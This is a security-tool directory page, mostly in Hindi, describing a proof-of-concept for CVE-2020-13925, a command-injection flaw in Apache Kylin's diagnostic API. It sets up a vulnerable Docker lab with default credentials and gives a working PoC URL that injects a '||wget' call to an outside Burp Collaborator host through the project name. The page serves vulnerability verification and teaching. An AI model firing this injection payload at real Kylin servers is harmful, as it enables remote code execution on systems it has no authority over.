Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bit4woo/cve-2020-13925
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubbit4woo/cve-2020-13925

CVE-2020-13925

CVE-2020-13925 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Apache Kylin के डायग्नोस्टिक API में एक कमांड इंजेक्शन भेद्यता, जो क्राफ्टेड प्रोजेक्ट नामों के माध्यम से रिमोट कोड एक्ज़ीक्यूशन की अनुमति देती है।

रिपॉजिटरी देखें
161636 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-13925

पर्यावरण सेटअप

संदर्भ के लिए https://github.com/apache/kylin देखें, Docker का उपयोग करके पर्यावरण की तैनाती करें, और उसमें संस्करण को 3.0.1 (कमजोरी वाला संस्करण) में बदलें। आप 【-m 8G \ 】 को हटा सकते हैं; इसका कार्य मेमोरी का आकार आवंटित करना है।

फिर http://host:7070/kylin/login पर जाएँ। प्रारंभिक उपयोगकर्ता नाम और पासवर्ड ADMIN/KYLIN है।

root@kitploit:~
docker pull apachekylin/apache-kylin-standalone:3.0.1

docker run -d \
    -m 8G \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1
    
docker run -d \
    -p 7070:7070 \
    -p 8088:8088 \
    -p 50070:50070 \
    -p 8032:8032 \
    -p 8042:8042 \
    -p 16010:16010 \
    apachekylin/apache-kylin-standalone:3.0.1

कमजोरी सत्यापन PoC

root@kitploit:~
原始请求:
http://host:port/kylin/api/diag/project/learn_kylin/download
        
PoC请求,GET方法:
http://host:port/kylin/api/diag/project/%7c%7cwget%20h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net%7c%7c/download

即将项目名称“learn_kylin”替换为如下payload访问即可:
||wget h1j96qoac5o9mbqpkewkhxxa218rwg.burpcollaborator.net||

पुनरुत्पादन चरण

System-Configuration-Diagnosis पर जाएँ। डायग्नोस्टिक जानकारी डाउनलोड करने के लिए अनुरोध ट्रिगर करें http://host:port/kylin/api/diag/project/learn_kylin/download image.png

अर्थात्, प्रोजेक्ट नाम "learn_kylin" को उपरोक्त payload से बदलकर एक्सेस करें।

image.png

संदर्भ लिंक

https://mp.weixin.qq.com/s/LdEgENX2_b8tb12n4H9KJQ

टूल डाउनलोड करें